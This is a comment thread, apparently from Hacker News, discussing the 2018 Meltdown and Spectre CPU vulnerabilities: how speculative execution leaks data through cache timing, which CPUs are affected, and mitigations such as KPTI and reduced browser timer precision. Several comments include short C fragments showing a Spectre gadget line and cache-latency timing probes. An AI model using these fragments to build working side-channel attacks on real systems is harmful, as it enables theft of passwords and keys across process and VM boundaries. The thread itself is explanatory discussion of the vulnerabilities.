I dunno. Potentially. But these are incredibly complicated bugs, which involve timing at the hardware level. There's nothing close to this in the Vault7/8 leaks.


If I were a betting man, I'd place my bet on them knowing about this for a long time, and possibly even being behind the bugs' introduction in the first place


I'm not familiar with the intricacies of CPU design. What are the odds the NSA somehow arranged for these vulnerabilities to exist?


I believe most crypto exchanges are running in the cloud. What could possibly go wrong?


I just sold all my altcoins for BTC on Binance as soon as I saw this and transferred them to gdax. Hopefully I can sell them for USD on gdax and transfer to a real bank before they get hacked.


Why would you do that? If you are concerned about the security of your coins, you should have moved them to a wallet you own that is not hosted on an exchange. The bank you transfer your dollars to is just as likely to get hit by the exact same vulnerability. In addition, you have to pay a fee to move your coins, then to wire the dollars to your bank account. Moving from crypto to fiat is also liable to taxation. If the sole goal is to secure your coins then I don't think the whole process is worth the hassle. Moving them to a private wallet would suffice.


> Moving from crypto to fiat is also liable to taxation

Trading between cryptoassets as GP suggests he has done already makes them subject to taxation. The fiat step isn’t needed.


Most banks don't use cloud providers AFAIK.

Also, real money transactions are much more likely than blockchain transactions to be reversible if fraudulent.


The majority of coins on Coinbase are in cold-storage and crypto on Coinbase is insured against this type of breach. I personally wouldn't panic to get my coins out.


There was an announcement not long ago saying they are not insured.


Can you reference that? The Coinbase support page currently says crypto is insured against security breaches on their end.


Crypto in their hot wallets, or crypto in cold storage?


at least the dollars are insured ;-)


So, basically, CPUs will execute instructions inside a branch even if the branch is eventually going to evaluate to false. Does the CPU do this to optimize branch instructions? The results of instructions that are executed ahead of time are stored in a cache. How exactly does this exploit read from the cache? I understand it uses timing somehow, but I'm not quite sure exactly how that works. (I mostly do software.)


The cache in question is not something which stores the result of these speculatively executed instructions, but the normal L1-L2-L3 caches we are used to. The result of these instructions is discarded, but as a side effect, they may load something from memory into the cache. The exploit detects whether or not a particular memory address was loaded into the cache (reading from something already in the cache is much faster than reading from the main memory).


Thanks for the helpful answer. :) Things make much more sense to me now.


It's a timing attack against the cache. The speculative execution might need to do a read, which means something would need to be evicted from the cache. This makes a subsequent read against that evicted address slower.

This way you can detect things based on speculative execution. I don't know how they go from that to reading memory though.


> I don't know how they go from that to reading memory though.

That was the second bit of the example source code:

unsigned long index2 = ((value&1)*0x100)+0x200;

This creates one of two different addresses, depending upon the value of bit zero of the memory location being attacked. The two different addresses are farther apart than the size of a cache line.

> unsigned char value2 = arr2->data[index2];

This actually does the read from one of the two different addresses (which results in the value located at one of them becoming resident in cache). Note that the value returned here is a "don't care" item.

Then, after everything unwinds from the speculation, the follow-on code on the real path reads from both of the two possible addresses that were put into "index2". The read that returns data faster must have been in cache. Knowing which one was in cache, you now know the value of bit zero of the target address location.

Repeat the same block of code for bits 1-7 and you'll have read a whole byte. Continue and you can read as much as you like. You just gather data very slowly (the article mentioned about 2000 bytes per second).
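
As a rough sketch of the timing side in C (assuming GCC/Clang on x86 with <x86intrin.h>; the cache-miss threshold is machine-specific and made up here):

  #include <stdint.h>
  #include <x86intrin.h>

  /* Time a single access; a short latency means 'addr' was cached. */
  static uint64_t probe_latency(volatile unsigned char *addr)
  {
      unsigned int aux;
      uint64_t start = __rdtscp(&aux);
      (void)*addr;                      /* the access being timed */
      return __rdtscp(&aux) - start;
  }

  /* Of the two candidate addresses, the one whose latency is well
     under the miss threshold (~100+ cycles on many parts) was
     already cached, revealing the bit. */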


Ah, that makes sense, thanks!

I was thinking of something similar but with a branching operation, but that would get screwed by branch prediction.


You arrange things so that the speculated execution loads from an address you provide (this is the target address you want to read), then uses the result of that load to calculate the address of another load (this one, into a location that aliases in the cache with an address you can load directly yourself).

You can then use cache timing to see which address was read in the second load, which means you can see part of the value that was read in the first load. Rinse, repeat.

The variants mostly amount to differences in how you arrange the first part (speculated execution loading from an address you get to provide).


The first implementation I've seen, on Twitter:

https://twitter.com/pwnallthethings/status/94869396135866777...


One of the Meltdown paper authors evidently has a sense of humor, since "hunter2" [0] is one of the passwords they use in their demonstration [1].

[0] http://bash.org/?244321

[1] https://meltdownattack.com/meltdown.pdf (page 13, figure 6)


hunter2 is the industry's accepted PoC password.


wasn't it dolphin?


A previous client used this; I always wondered.


So what exactly are they going to do about Spectre? It seems pretty unstoppable from what I can see.

Can they disable speculative exec completely for sensitive boxes or is this too baked in?


There's no mitigation. We'll need new CPUs.

Meanwhile, don't ever run untrusted code in the same process as any kind of secret. Better yet, don't ever run untrusted code.


I wonder what fraction of data inside a kernel is really ‘private’.

Obviously we want 100% of the data in the kernel not to be writeable, but if only a small amount shouldn’t be accessible at all then maybe the long term solution is to handle that data in a special way. Something that makes using it slower but doesn’t make every other syscall suffer as much as a consequence.

Or maybe the solution is to prioritize moving more and more code into userspace.


Well the good news is that now microkernels can take over. With KPTI (also known as FUCKWIT), a syscall is now as expensive as a context switch to another userland process.

Of course, that means now monolithic kernels run just as slow as microkernels.



I've read them — but the important factor is that Linux with KPTI is now doing a full context switch between userland and kernel, which is the same cost as switching to another userland process to handle the syscall (which is exactly what a naive microkernel would do).

I've always been a proponent of microkernels, and this is another situation that might help with this.

(Personally, I've been affected by the failures of monolithic kernels way too often. When a simple OpenGL or WebGL program manages to hang your GPU driver, parts of the kernel, and all DMA operations in the kernel, and your system becomes unusable, then reasonable isolation would be preferable)


Recent Intel CPUs have PCID (TLB tagged by process ID), which makes KPTI not much slower than what we had last week.


Hypervisors and containers already blur this line. I think we were heading there anyway.

But a microkernel is going to have multiple processes talking to each other, so there will still be more overhead whenever a message requires coordination between more than two processes.


The performance differential is a concern with classical microkernel designs but not really with modern ones. The process isolation is useful when dealing with Meltdown but not with Spectre.


I wondered that. But it's really hard. My guess is that most of it needs to be read protected.

Consider:

• Network packet buffers? Yes.

• Graphics driver command buffers? Yes.

• Disk caches? Yes.

• Kernel pointers of any kind? Yes if you care about KASLR.

It's actually kind of hard to think of data in the kernel that shouldn't be read protected.


>We'll need new CPUs.

I don't think that's an option either.


Can someone more knowledgeable than me in regards to this vulnerability tell me:

1. How to best protect my local personal data from being subject to this?

2. Whether I should seriously consider pulling all my cryptocurrency off of any exchanges?


From my understanding:

1:

- install security updates for your OS

- if they're not ready yet: disable JavaScript in your browser by default and enable it only for resources you trust; otherwise just skip the page

- execute third-party code with extra caution; any suspicious code should go away (even inside a VM)

2: as long as it's stored in a wallet on your own hardware which you fully control, it should be safe enough


2. Don't ever store large values of cryptocurrency on an exchange. Keep them offline in paper or hardware wallets.


So how much legal liability are they exposed to due to this security flaw?

Since this affects legacy systems that may not be able to be upgraded it seems like this issue will be around for a very long time.


Since this affects legacy systems that may not be able to be upgraded it seems like this issue will be around for a very long time.

It also only affects "legacy systems" which routinely run nontrusted code. If it's something like e.g. a server in a bank, chances are everything running on it has already been accounted for. This isn't like e.g. Heartbleed where you could just connect to any open server and read its memory --- you have to somehow get your code to run on it first.


Really makes the case against going to the "cloud" (using hosted VM solutions) versus just using colocated servers running VMWare that you fully own and administer.


However, since it seems like there is not much anyone can do to identify what is being leaked and what process did it, this does increase the risk that someone might exploit this internally and get away with it.


I can't understand this paragraph from [1]:

> Cloud providers which use Intel CPUs and Xen PV as virtualization without having patches applied. Furthermore, cloud providers without real hardware virtualization, relying on containers that share one kernel, such as Docker, LXC, or OpenVZ are affected.

I take it to imply that hypervisors that use hardware virtualization are not affected. However, the PoC that reads host memory from a KVM guest seems to contradict this.

Is it because on Xen HVM, KVM, and similar hypervisors, only kernel pages are mapped in the address space of the VM thread (so a malicious VM cannot read memory of other VMs), but on these other hypervisors, pages from other containers are mapped? Yet the Xen security advisory [2] says:

> Xen guests may be able to infer the contents of arbitrary host memory, including memory assigned to other guests.

Relatedly, what sensitive information other than passwords could appear in the kernel memory? I'd expect that at the very least buffers containing sensitive data pertaining to other VMs may be leaked.

[1] https://meltdownattack.com/ [2] https://xenbits.xen.org/xsa/advisory-254.html


The kernel memory map generally includes the 'direct map' of all physical memory - so, everything that is resident is potentially at risk.


> Meltdown breaks all security assumptions given by address space isolation as well as paravirtualized environments and, thus, every security mechanism building upon this foundation.

> On affected systems, Meltdown enables an adversary to read memory of other processes or virtual machines in the cloud without any permissions or privileges, affecting millions of customers and virtually every user of a personal computer.


Reading over this.... it sounds like ultimately the exploit in Linux still only works thanks to being able to run stuff in the kernel context through eBPF?

The first section states that even with the branch prediction you still need to be in the same memory context to be able to read other process's memory through this. But eBPF lets you run JIT'd code in the kernel context.

I guess this JITing is also the issue with the web browsers, where you end up getting access to the entire browser process memory.

But ultimately the dangerous code is still code that got a "privilege upgrade"? the packet filter code for eBPF, and the JIT'd JS in the browser exploit?

So if our software _never_ brought user's code into the kernel space, then we would be a bit safer here? For example if eBPF worked in... kernel space, but a different kernel space from the main stuff? And Site Isolation in Chrome?


No. For that attack, the code that is speculatively executed does need to be in the target context, but that doesn't mean the code has to be attacker-supplied (that just makes it easier).

It's also possible to use existing code in the target context as the speculative execution path if it has the right form (and this is what P0's Variant 2 POC does, in that case by poisoning the branch predictor in order to make it speculatively execute a gadget that has the right form).


I should first point out that I am by no definition an expert on CPU design, operating systems, or infosec.

But I just remembered that years ago the FreeBSD developers discovered a vulnerability in Intel's Hyperthreading that could allow a malicious process to read other processes' memory.[1]

To the degree that I understand what is going on here, that sounds very similar to the way the current vulnerabilities work.

For a while, back then, I was naive enough to think this would be the end of SMT on Intel CPUs, but I was very wrong about that.

So I am wondering - is this just a funny coincidence, or could people have seen this coming back then?

[1] http://www.daemonology.net/hyperthreading-considered-harmful...


The ARM whitepaper is also worth a read in terms of how it affects them and mitigations on that platform: https://developer.arm.com/support/security-update


I'm really amazed by the simplicity of the meltdown gadget. After the initial blog post I played with a few variants, but always got the zeroed out register in the speculative branch. I guess what people (including me) were looking for here was some other side channel or instruction that did not have this mitigation in place (e.g. I had hoped a cmpxchg would leak whether the target memory address matches the register to compare with). The shl/retry loop makes a lot of sense if you instead assume that the mitigation was implemented improperly and can race subsequent uops. I really can't imagine why this data ever made it to the bypass network to be available to other uops.


I wonder if the whole thing with enormously complex CPUs requiring deep pipelines which in turn requires complex speculation etc was a design mistake? Is there an alternative history where mainstream CPUs are equally fast with a dumber/simpler design?


There may well be. One alternative design that could have become the mainstream is VLIW. One of the features of VLIW is the idea of predication. Instead of a branch instruction altering the instruction fetch stream based upon the value of a flag bit in some form of condition code register, instruction syllables are encoded with predicates which simply control whether or not the instruction syllable has any effect, based upon the value of a flag bit in some form of predicate register.

VLIW is not a panacea, engineering being all about tradeoffs after all. But it was intended to not need the complex instruction dispatching logic, with things like speculative execution and branch prediction, in the processor. Instead, using a process called if-conversion, the compiler combines the two possible results of a conditional branch into a single instruction stream where predicates control which instruction syllables are executed.

* http://web.eecs.umich.edu/~mahlke/papers/1996/schlansker_hpl...

* https://www.isi.edu/~youngcho/cse560m/vliw.pdf

* https://www.cse.umich.edu/awards/pdfs/p45-mahlke.pdf

Observe, in considering this alternative history, that the Itanium had 64 predicate registers. People have, in the past few days in various discussions of this subject, criticized Intel for holding on to a processor design for decades and prioritizing backwards compatibility over cleaner architecture. They have forgotten that Intel actually produced a cleaner architecture, back in the 1990s.


What requires the complex speculation is not the pipeline depth, it's the memory access latency.

Consider the following simple C code: "if (arr[idx]) { ... }". Without speculation, the core must stall until the condition has been read from memory, which can be hundreds of cycles if it's not in the cache. With speculation, these wasted cycles are instead used to do some of the work from most probable side of the branch, so when the condition finally arrives from memory, there's less work left to do.

The pipeline depth only affects what happens when the speculation predicted the wrong way: since the correct way is not on the pipeline, it has to fill the pipeline from scratch.


Not that we currently know about. RISC instead of CISC is better here as it shortens the pipeline, but even RISC processors do speculative predictions due to the cost of waiting till a branch is fully decided.


The vulnerability window is proportional to the size of the reorder buffer (hundreds of instructions); the pipeline length (tens of stages) is not important (except on strictly in order CPUs with no reorder buffer I guess).

Also modern OoO CISCs and RISCs have very similar pipeline depths for the same performance/power budget.


What about more radically different designs? E.g Mill or others?


The Mill does prediction:

https://millcomputing.com/docs/prediction/

It has to. The problem is the speed of light here, not a simple slipup by a CPU designer.


So all that needs to be done is make 64GB L1 on the die...


Not possible - the physical size of 64GB (even at nm scale) means that the time it takes for a signal to traverse it causes memory to take a long time to access, meaning you need a L0 cache to maintain performance.


We need to go 3d


The speed gains are very real, so I wouldn't call it a mistake.

The side effects could obviously have been mitigated better, but hindsight is 20/20.


Since no one has yet posted the Amazon AWS security bulletin:

https://aws.amazon.com/security/security-bulletins/AWS-2018-...


https://github.com/IAIK/meltdown 404's. I assume this is intentional? So full disclosure, but missing the code? Or is it somewhere else?


Due to the early embargo lifting, I expect not everything has been publicized yet.


According to the page, Project Zero only tested with AMD Bulldozer CPUs. Why didn't they use something based on Zen/Ryzen? It's not clear if the 3 issues affect Zen/Ryzen or not.


Ryzen is affected by Spectre but not Meltdown, by the looks of it.


Just an idea that I had:

If these exploits seem to rely on taking precise timing measurements (on the order of nanoseconds), could we eliminate or restrict this functionality in user space?

The Spectre exploit uses the RDTSC instruction, and this can apparently be restricted to privilege level 0 by setting the TSD flag in CR4.

I know it would kind of suck, but it might be better than nothing.

I would think that most typical user applications wouldn't require that accurate a time measurement. If they do, then maybe they can be whitelisted?
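
For reference, this is the kind of unprivileged code that would start faulting with #GP if CR4.TSD were set, sketched with the GCC/Clang intrinsic:

  #include <stdio.h>
  #include <x86intrin.h>

  int main(void)
  {
      /* With CR4.TSD set, RDTSC at CPL > 0 raises #GP, so this
         read of the timestamp counter would crash the process. */
      unsigned long long t = __rdtsc();
      printf("%llu\n", t);
      return 0;
  }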


Denying access to timers is kind of practical for browser JavaScript, and should and will happen. But it's not practical for native processes, because shared memory multithreading provides as high precision a timer as anyone could ask for: just increment a counter in a loop in a different thread.

In fact, the practical JavaScript attacks use this method (using SharedArrayBuffer) and the browsers are disabling this (new, little used) feature as a mitigation. But I'm afraid hell will freeze over before mainstream operating systems deny userspace access to clocks, threads, and memory mapped files, which is a lower bound on what it would take to make the attack much harder.
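
A sketch of that counter-thread clock in C (purely illustrative):

  #include <pthread.h>
  #include <stdatomic.h>

  static _Atomic unsigned long long ticks;

  /* The "timer": a thread that increments as fast as the core allows. */
  static void *counter_thread(void *arg)
  {
      (void)arg;
      for (;;)
          atomic_fetch_add_explicit(&ticks, 1, memory_order_relaxed);
      return NULL;
  }

  /* Two loads of 'ticks' around an operation give a duration with
     roughly cycle-level resolution - no RDTSC needed. */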


That is the approach Firefox is taking [1]:

> Since this new class of attacks involves measuring precise time intervals, as a partial, short-term, mitigation we are disabling or reducing the precision of several time sources in Firefox.

[1]: https://blog.mozilla.org/security/2018/01/03/mitigations-lan...


What is the reason that Intel would allow speculative instructions to bypass the supervisor bit and access arbitrary memory? That seems to be the root cause of Meltdown.

Is it that the current privilege level could be different between what it is now, and what it will be when the speculative instruction retires? If so then that seems a thin justification. CPL should not change often so it doesn't seem worth it to allow speculative execution for instructions where a higher CPL is required.


IIUC, these speculative instructions respect the current supervisor bit which was set by the previous faulting instruction.


There are 3 known CVEs related to this issue in combination with Intel, AMD, and ARM architectures. Additional exploits for other architectures are also known to exist. These include IBM System Z, POWER8 (Big Endian and Little Endian), and POWER9 (Little Endian).

https://access.redhat.com/security/vulnerabilities/speculati...


How come this wasn't discovered sooner?

It would seem to me that all the really smart people who designed super-scalar processors and all the nifty tricks that CPUs do today - would have thought that these attacks would be in the realm of possibility. If that's the case - who's to say these attacks haven't been used in the wild by sophisticated players for years now?

Seems like the perfect attack. Undetectable. No log traces.


Could somebody please coin a name for this? Wikipedia currently calls it "Intel KPTI flaw", but that is very vague. It's quite difficult to talk about something without a simple easy-to-remember name.

Edit: has been settled, it's https://en.wikipedia.org/wiki/Meltdown_(security_bug) .



the MEMTHIEF bug


Is there any information available about whether the Linux KPTI patch mitigates the ability to use eBPF to read kernel memory?

I'm asking because eBPF seems to execute within the kernel, and KPTI seemed to be about unmapping kernel page table when userspace processes execute.

Are there any mitigations to the eBPF attack vector?


sysctl -w kernel.unprivileged_bpf_disabled=1

I use eBPF all the time, but I never use it as non-root, so I haven't needed unprivileged bpf anyway.

update: that eBPF vector was already fixed, and another safety measure is already being considered https://lkml.org/lkml/2018/1/3/895


Isn't it possible for the kernel to patch all clflush instructions when the software is loaded, to keep a circular list of all evicted addresses that would be evicted again on the interrupt that happens when the protected address is read? This way the timing attack would not be possible.


Self-modifying code (which exists) would take a massive performance hit. Any time a page is marked +X, the kernel would have to mark it -W, and then on page fault the kernel would have to check whether userspace was changing something into a clflush instruction.

Oh, and x86 has variable-length instructions - the same byte stream can decode as different instructions depending on where you start - so I doubt it's possible at all on x86 without a massive performance hit (you'd have to keep track of every jump instruction in the entire address space...)


You are right.

The best approach is to evict all user space pages from cache when an invalid page access happens if the page fault was caused by the software trying to read/write kernel space pages.

Massive performance hit but only to misbehaved software. Normal software will not have the performance hit of the current solution.

The kernel could even switch to the unmapped-kernel-pages solution if there are too many read/write attempts.


clflush only makes the attack easier. There are other ways to flush the cache. Besides: code is mutable. You can just make a clflush instruction out of thin air without the loader's involvement.


For software that requires self-modifying code to run, the existing Linux kernel patch would apply (performance penalty). If there are other ways to flush the cache, it is necessary to evict the entire software's memory on the interrupt.


So in all cases, just evict the entire process memory from the cache when the interrupt is raised on a read from protected memory. The performance penalty would apply only to misbehaved code.


Are extensions like 1Password vulnerable? Do they run in the same process as JS from a page?


Process is irrelevant for both Meltdown and Spectre.


Process is relevant for what you can get to from the V8 VM.


Is this saying that AMD is affected? Is this the same as the Intel bug reported earlier?


Yes, AMD is affected. There are multiple vulnerabilities (Project Zero refers to 3 separate "variants", variant 1 and 2 being called "Spectre" and variant 3 being called "Meltdown"). The most serious variant only affects Intel, but can be patched. The other 2 variants affect AMD, ARM, and Intel, and cannot be patched.

See this excerpt from spectreattack.com:

>Which systems are affected by Meltdown?

>Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013). We successfully tested Meltdown on Intel processor generations released as early as 2011. Currently, we have only verified Meltdown on Intel processors. At the moment, it is unclear whether ARM and AMD processors are also affected by Meltdown.

>Which systems are affected by Spectre?

>Almost every system is affected by Spectre: Desktops, Laptops, Cloud Servers, as well as Smartphones. More specifically, all modern processors capable of keeping many instructions in flight are potentially vulnerable. In particular, we have verified Spectre on Intel, AMD, and ARM processors.


Of the variants of the attack that can leak privileged memory, AMD is only impacted if a non-default kernel configuration is enabled: "BPF JIT"


This is not correct. That's just what the POC chose to implement.


Google security blog says it is.

> These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running them.

https://security.googleblog.com/2018/01/todays-cpu-vulnerabi...


That's unclear, to the point of being factually wrong. The Variant 2 and Variant 3 PoCs only affect Intel, and those are the ones people are most talking about and, at least to me, the most concerning.

Treating them as a group ignores the very real differences in effect.

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


https://meltdownattack.com/meltdown.pdf

>6.4 Limitations on ARM and AMD

>We also tried to reproduce the Meltdown bug on several ARM and AMD CPUs. However, we did not manage to successfully leak kernel memory with the attack described in Section 5, neither on ARM nor on AMD. The reasons for this can be manifold. First of all, our implementation might simply be too slow and a more optimized version might succeed. For instance, a more shallow out-of-order execution pipeline could tip the race condition against the data leakage. Similarly, if the processor lacks certain features, e.g., no re-order buffer, our current implementation might not be able to leak data. However, for both ARM and AMD, the toy example as described in Section 3 works reliably, indicating that out-of-order execution generally occurs and instructions past illegal memory accesses are also performed.

Seems like the possibility exists that AMD/ARM could be affected, based on the behavior they saw, but they were not able to successfully verify.


The Intel behaviour is probably the result of an optimization / architectural decision: when the micro-ops fetch a value from memory, they are probably fetching the real value and then setting a flag that the instruction is invalid. It might be cheaper to deal with the problem later in the pipeline than earlier.

But it might also be reasonable, in a different architecture, to fetch 0 straight into the micro-op when the memory access is invalid and set a flag to raise the exception as well. In this situation you don't have the problem, because you are just shuffling around invalid data.


That's fair, but the leads on multiple press releases are that this affects all processors equally, which feels very disingenuous to me. Intel's latest press release, for example.


From https://meltdownattack.com/meltdown.pdf, page 12:

> Thus, the isolation of containers sharing a kernel can be fully broken using Meltdown.


Looks like the information was somewhat publicly available since the middle of last year on https://cyber.wtf/2017/07/28/negative-result-reading-kernel-... and http://www.cs.binghamton.edu/%7Edima/micro16.pdf. Also similar methods from a 2013 paper, http://www.ieee-security.org/TC/SP2013/papers/4977a191.pdf (timing side-channel attacks).

Any reason for the panic now? Any known malware using it?


No. This was all scheduled to be released on January 9th, but the release was sped up after people started connecting dots.

We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation.

https://security.googleblog.com/2018/01/todays-cpu-vulnerabi...


I know it was scheduled, but the information at the links is public and predates the scheduled disclosure. A hacker could have figured out the problem by reading the available information before Google Project Zero did.


Juicy PoC exists?


Can someone show me an example of JavaScript code running in a browser that would display a password stored in kernel space?

Websites like the Guardian report that this is now the case but I don't understand how that's possible.


The kernel maps itself into the address space of each process as an optimization to increase the performance of system calls. So yes, it is possible.


So, which functions would you have to call? How would you read the secrets? You can't do any kind of pointer magic in JS (nor system calls).


Will patches for this eventually trickle down to things like LineageOS?


LineageOS is based on official Android sources. The moment the official Android kernel is patched, LineageOS will use the patch.


I like the way you say "moment", as if the Android kernel is some single thing and not a hodgepodge of hundreds of different kernels across tens of companies.


Thanks to incidents like these, I'm very happily employed. One of the perks of working in infosec.

I hereby nominate 2018's song to be Billy Joel's We Didn't Start the Fire.


Does this vulnerability affect Linux only, or any operating system?


The issue is with the chip. So, it should impact any OS running on the chip. This would include Windows as well as MacOS running on Intel chips.


Do we know how news of this got out before the disclosure date?


See this blog post, which is some very informed speculation based on public Linux kernel patch activity. http://pythonsweetness.tumblr.com/post/169166980422/the-myst...


I couldn't find it in the blog post or the Compute Engine Security Bulletin; does anyone know which version of the Linux kernel contains the mitigation?


4.14.11 is the only stable kernel with the mitigation as of this writing.


Based on a link here yesterday, there was a patch to the Linux kernel and comments associated with it.


This sounds really bad. I wonder: Will this have major implications on consumers other than slowed down devices?


does this mean the embargo is lifted?



> We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation.


Should we start to think seriously about adopting homomorphic encryption in virtualized environments?


No wonder they were rushing this.


As a side topic, are we really at a point where even vulnerabilities need branding and websites?


Why not? Those big security vulnerabilities are going to be discussed for years to come; might as well come up with something a little catchier than CVE-2017-5753. I guess they could've gone with more descriptive names.

At least "spectre" and "meltdown" will be memorable even for non-technical people (who should probably be aware of the issue even if they don't understand the technical details). "Bounds check bypass" and "branch target injection" probably sound like random words stringed together for most people.


Well, these are essentially research papers, and people invested lots of time; it'll have an impact on their careers.

So yeah, making it nice and pretty seems appropriate, just like a CV.


Thanks again to the geniuses who arranged things so that almost anyone can write code that I must run just so I can use the internet to find and to read public documents

(unless I undergo the tedious process of becoming a noscript user or something similar).


Best for now to get your crypto coins off the exchanges if you have them there.


"Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host."

Holy shit.


We should quote OpenBSD's Theo de Raadt here, all the way back from 2007:

"x86 virtualization is about basically placing another nearly full kernel, full of new bugs, on top of a nasty x86 architecture which barely has correct page protection. Then running your operating system on the other side of this brand new pile of shit."

https://marc.info/?l=openbsd-misc&m=119318909016582&w=2


Hmm. Is OpenBSD patched for Meltdown? I don't see anything on their main site.


> The infrastructure that runs Compute Engine and isolates customer workloads from each other is protected against known attacks. This also means that customer VMs are protected against known, infrastructure-based attacks from other malicious VMs.

Doesn't Google say that they are protected...?


This means that Customer A's VM cannot attack Customer B's VM.

However, if the OS inside the VM is unpatched, then code inside the VM can attack other code inside the VM. If for example you install some malware on your VM, it could use this attack.

(I am not a security expert; this is just my understanding and not an official Google statement.)


Right. But it means that once the VM is fixed, assuming the customer does this, they are guarded from such attacks, right?


Not against Spectre, which can extract any memory via JavaScript or user applications. E.g. your secret keys or passwords.


Spectre is a much more serious bug, I feel, but it requires the VM to run the malicious code snippet inside itself and with the right context, not from another guest VM; that is how I understand this. The kind of bug that would totally destroy cloud as a business is one where another guest VM can read your memory... which doesn't seem to be the case, for now...


Spectre is mostly about JavaScript extracting keys and passwords from the browser process. Install their ChromeZero extension for a start.

Meltdown on the other hand can do everything. But only on Intel.


This basically kills cloud computing for anything sensitive using shared hardware. In the short term this will actually be good for cloud providers because the demand for dedicated instances will shoot up as there is no short-term alternative.


> The infrastructure that runs Compute Engine and isolates customer workloads from each other is protected against known attacks. This also means that customer VMs are protected against known, infrastructure-based attacks from other malicious VMs.


The short term answer is to patch the servers and swallow the 30% performance cut. Still likely cheaper than dedicated servers.


Which could mean huge sales for Intel, or even AMD, if Amazon, DigitalOcean, Linode and others want to rush to get that lost performance back.

Going to AMD would be incredibly expensive as you'd be replacing nearly everything, but if Intel gets new chips out in a reasonable amount of time, they might actually make a killing on this.


"Compute Engine customers must update their virtual machine operating systems and applications so that their virtual machines are protected from intra-guest attacks and inter-guest attacks that exploit application-level vulnerabilities."

"Compute Engine customers should work with their operating system provider(s) to download and install the necessary patches."


The main/big impacts are on cloud computing.

For home computers and standard office use, there is no impact at this point, right?


Until someone figures out how to exploit it using JavaScript. The speed this is moving, it could be any minute now.


From spectre.pdf:

> In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

(granted I think site isolation, if enabled, mitigates crossing domain boundaries)

It goes on to show a sample JS impl that JITs into the expected insns using V8.


And we can't even read TFA with JavaScript disabled; you have to be less secure just to read the Google security blog.

Edit - mixing it up with this other article (https://security.googleblog.com/2018/01/todays-cpu-vulnerabi...)


I can read the article without JS just fine.


Yet another argument against running any native or 1-to-1 bytecode in the browser, like WASM.


The big if is whether JavaScript code that can exploit this can be written. (Edit: that's a yes, from the PDF itself...) If yes, nobody's safe, as any webpage (any webpage, even that ad in an iframe) could in theory read your password if it's anywhere in RAM.


Firefox and Chrome have both started posting mitigation strategies. They're mentioned in other comments, some depending on making time functions less accurate since this is a timing attack.


Chrome is listed as impacted. People use Chrome's password manager.


Chrome is listed as impacted due to JavaScript being able to read memory from outside the browser sandbox.

"In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it." - from the spectre paper


Was this quote removed from the article? I'm no longer able to find it.


>running on the host, can read host kernel memory at a rate of around 1500 bytes/second,

I kinda get how it works now. They force speculative execution to do something with a protected memory address, and then measure the latency to guess the content. They did not find a way to continue execution after a page fault, as rumors suggested.

The fact that a speculative execution branch can access protected memory, but not commit its own computation results to memory, has been known on IA-32 since Pentium 3 times.

It was dismissed as a "theoretical only" vulnerability without possible practical application. Intel kept saying that for 20 years, but here it is, voila.

The ice broke in 2016 when Dmitry Ponomarev wrote about the first practical exploit scenario for this well-known IA-32 branch prediction artifact. Since then, I believe, quite a few people were trying each and every possible instruction combination for use in a timing attack, until somebody finally got one that works, which was shown behind closed doors.

Edit: google finally added reference to Ponomarev's paper. Here is his page with some other research on the topic http://www.cs.binghamton.edu/~dima/


link for details for that from Project Zero:

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


Thanks! We've merged another thread and updated this link from https://security.googleblog.com/2018/01/todays-cpu-vulnerabi....


Interesting. Quoting a fair-sized chunk for context:

> So far, there are three known variants of the issue:

> Variant 1: bounds check bypass (CVE-2017-5753)

> Variant 2: branch target injection (CVE-2017-5715)

> Variant 3: rogue data cache load (CVE-2017-5754)

> During the course of our research, we developed the following proofs of concept (PoCs):

> A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.

> A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]

> A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)

> A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

If I'm reading this right, then the only PoC that works against ARM is the first one, which lets you read data within the same process. Not too impressive. (Yes, I know that I'm reading into this that they tried to run all the PoCs against all the processors. But the "Tested Processors" section lower down leads me to believe that they did in fact do so.)

The third and fourth PoCs seem to be Intel-specific.


The paper from the other people who discovered this says the same thing: "We also tried to reproduce the Meltdown bug on several ARM and AMD CPUs. However, we did not manage to successfully leak kernel memory with the attack described in Section 5, neither on ARM nor on AMD." The general purpose attack that leaks kernel memory, the one that KAISER fixes, only seems to work on Intel CPUs. Intel's press release was misleading.


Well... reading further, below the details of the third POC, they say "Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked."

So it seems like they tried it on AMD and ARM, but they tried much harder on Intel. That's less reassuring than my initial reading.


Way better link, thanks.


In 1-2 words, IMO, the problem is "over-optimisation".

